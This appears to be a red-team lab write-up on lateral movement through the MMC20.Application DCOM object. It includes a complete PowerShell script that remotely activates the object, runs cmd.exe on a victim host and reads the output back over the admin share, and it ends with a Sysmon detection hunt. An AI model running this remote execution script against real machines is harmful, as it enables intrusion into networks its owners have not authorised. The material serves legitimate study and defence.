
Lateral Movement via DCOM

Lateral Movement via Distributed Component Object Model

The Microsoft Component Object Model (COM) is a platform-independent, distributed, object-oriented system for creating binary software components that can interact. COM is the foundation technology for Microsoft's OLE (compound documents), ActiveX (Internet-enabled components), as well as others.

https://docs.microsoft.com/en-us/windows/desktop/com/the-component-object-model

This lab explores a DCOM lateral movement technique that abuses the MMC20.Application COM object, as originally researched by @enigma0x3 in his blog post "Lateral Movement using the MMC20.Application COM Object". Remote activation of that object is an ordinary DCOM request to the victim's RPC endpoint mapper, and the method it exposes for running shell commands executes them on the victim without touching WMI, PsExec or WinRM.

Execution

The MMC20.Application COM class is registered under HKEY_CLASSES_ROOT\MMC20.Application; its CLSID subkey holds the class identifier that DCOM activates when the ProgID is requested. The registry entry is shown below:

The same lookup can be done from PowerShell:

Establishing a connection to the victim host, which activates the COM server remotely over DCOM (this requires local administrator rights on the victim):

Executing a command on the victim system via the DCOM object:

Below is the command execution and its result: the output of the hostname command, run on the remote machine, is written to c:\fromdcom.txt on the victim:
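The whole procedure above, end to end, as an added PowerShell example that is not the lab's own code; it follows the technique from the referenced @enigma0x3 post. It assumes the session runs as a user with local administrator rights on the victim (offense\administrator in this lab), that the victim is 10.0.0.2 as above, and that TCP/135 plus the DCOM dynamic RPC port range are reachable. The `Quit()` call and the read-back over the admin share are additions for tidiness and verification, not part of the original technique.

```powershell
# Added example, not the lab's original code. Assumes admin rights on $Target and
# network reachability of TCP/135 and the DCOM dynamic port range.
$Target  = '10.0.0.2'          # victim host from the lab
$OutFile = 'c:\fromdcom.txt'   # result file written on the victim, as in the lab

# 1. Registry lookup: HKCR\MMC20.Application\CLSID maps the ProgID to the class
#    identifier that DCOM will activate on the remote host.
$clsid = (Get-ItemProperty -Path 'Registry::HKEY_CLASSES_ROOT\MMC20.Application\CLSID').'(default)'
"MMC20.Application CLSID: $clsid"

# 2. Remote activation: GetTypeFromProgID with a server name sends the DCOM activation
#    request to the victim's RPC endpoint mapper; CreateInstance returns a proxy to an
#    mmc.exe instance that the DcomLaunch svchost starts on the victim.
$com = [Activator]::CreateInstance([Type]::GetTypeFromProgID('MMC20.Application', $Target))

# 3. Document.ActiveView.ExecuteShellCommand(Command, Directory, Parameters, WindowState)
#    runs an arbitrary command in the context of that mmc.exe. Nothing is returned to the
#    caller, so the output is redirected to a file on the victim. Window state 7 = minimized.
$com.Document.ActiveView.ExecuteShellCommand(
    'c:\windows\system32\cmd.exe', $null, "/c hostname > $OutFile", '7')

# 4. Verify by reading the file back over the admin share (also needs admin rights);
#    the path C:\fromdcom.txt becomes \\10.0.0.2\C$\fromdcom.txt.
$remotePath = "\\$Target\" + $OutFile.Replace(':', '$')
Start-Sleep -Seconds 2
Get-Content -Path $remotePath

# 5. Tear down the remote mmc.exe so it does not linger as an artifact.
$com.Quit()
```

ExecuteShellCommand runs the command under the account that activated the object, so the file lands on the victim with the caller's identity; the admin share read in step 4 is only there to confirm execution and can be dropped when the result is collected some other way.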

Observations

Once the connection from the attacker to the victim is established using the PowerShell below:

This is what happens on the victim: the DCOM activation request arrives at the RPC endpoint mapper, the DcomLaunch svchost.exe spawns mmc.exe (with the -Embedding switch COM passes to servers it activates on a client's behalf), and mmc.exe registers an RPC endpoint on a dynamic high port, which is the port the attacker's proxy then connects to for the method calls:

A network connection is logged from 10.0.0.7 (attacker) to 10.0.0.2 (victim) under offense\administrator (this can also be seen in the screenshot above):
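A hunt for the two host artifacts described in the observations above (svchost.exe spawning mmc.exe with -Embedding, and mmc.exe accepting an inbound connection), as an added PowerShell example that is not part of the lab. It assumes Sysmon is installed on the victim with process-creation (Event ID 1) and network-connection (Event ID 3) logging enabled; the property names are Sysmon's. The sample records are constructed to mirror what the lab observed and are not real log output; `Get-SysmonRecords` reads the live log with the same field names, so the two test functions work on either input.

```powershell
# Added example, not the lab's original code. Assumes Sysmon Event IDs 1 and 3 are logged.

function Test-DcomMmcLaunch {
    # A process-creation record that looks like DCOM activation of MMC20.Application:
    # mmc.exe started by svchost.exe (the DcomLaunch host) with the -Embedding switch.
    # A user opening a console interactively is started by explorer.exe with an .msc argument.
    param([Parameter(Mandatory)] $Event)
    ($Event.Image -match '\\mmc\.exe$') -and
    ($Event.ParentImage -match '\\svchost\.exe$') -and
    ($Event.CommandLine -match '-Embedding')
}

function Test-DcomMmcInbound {
    # An inbound connection accepted by mmc.exe, i.e. the RPC endpoint it registers after
    # activation. Interactive MMC use does not accept inbound connections, so any hit is
    # worth a look; the remote peer is the DCOM client (10.0.0.7 in this lab).
    param([Parameter(Mandatory)] $Event)
    ($Event.Image -match '\\mmc\.exe$') -and ($Event.Initiated -eq 'false')
}

function Get-SysmonRecords {
    # Reads Sysmon events 1 and 3 from the live log and flattens the EventData fields into
    # objects with the same property names the test functions use.
    param([int]$MaxEvents = 5000)
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Sysmon/Operational'; Id = 1, 3 } -MaxEvents $MaxEvents |
        ForEach-Object {
            $obj = [ordered]@{ EventId = $_.Id; TimeCreated = $_.TimeCreated }
            foreach ($d in ([xml]$_.ToXml()).Event.EventData.Data) { $obj[$d.Name] = $d.'#text' }
            [pscustomobject]$obj
        }
}

# Constructed sample records modelled on the lab's observations (not real log output).
$sample = @(
    [pscustomobject]@{ EventId = 1; Image = 'C:\Windows\System32\mmc.exe'; ParentImage = 'C:\Windows\System32\svchost.exe'
                       CommandLine = '"C:\Windows\system32\mmc.exe" -Embedding'; User = 'OFFENSE\administrator' }
    [pscustomobject]@{ EventId = 1; Image = 'C:\Windows\System32\mmc.exe'; ParentImage = 'C:\Windows\explorer.exe'
                       CommandLine = '"C:\Windows\system32\mmc.exe" eventvwr.msc'; User = 'OFFENSE\bob' }
    [pscustomobject]@{ EventId = 3; Image = 'C:\Windows\System32\mmc.exe'; Initiated = 'false'
                       SourceIp = '10.0.0.7'; DestinationIp = '10.0.0.2'; DestinationPort = '49675'; User = 'OFFENSE\administrator' }
)

# Only the svchost-spawned launch and the inbound connection match; the interactive
# eventvwr.msc launch is left alone.
$launches = $sample | Where-Object { $_.EventId -eq 1 -and (Test-DcomMmcLaunch $_) }
$inbound  = $sample | Where-Object { $_.EventId -eq 3 -and (Test-DcomMmcInbound $_) }
$launches | Format-Table EventId, User, ParentImage, CommandLine -AutoSize
$inbound  | Format-Table EventId, User, SourceIp, DestinationIp, DestinationPort -AutoSize

# Against the live log on the victim, replace $sample with: $sample = Get-SysmonRecords
```

Pairing the two signals is what keeps the false-positive rate down: mmc.exe under svchost.exe with -Embedding also appears for some legitimate local COM activations, but one that is followed within seconds by an inbound RPC connection to that same mmc.exe from another host, under an administrator account, is the lateral movement pattern described above. The network event also gives the attacker address to pivot on.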
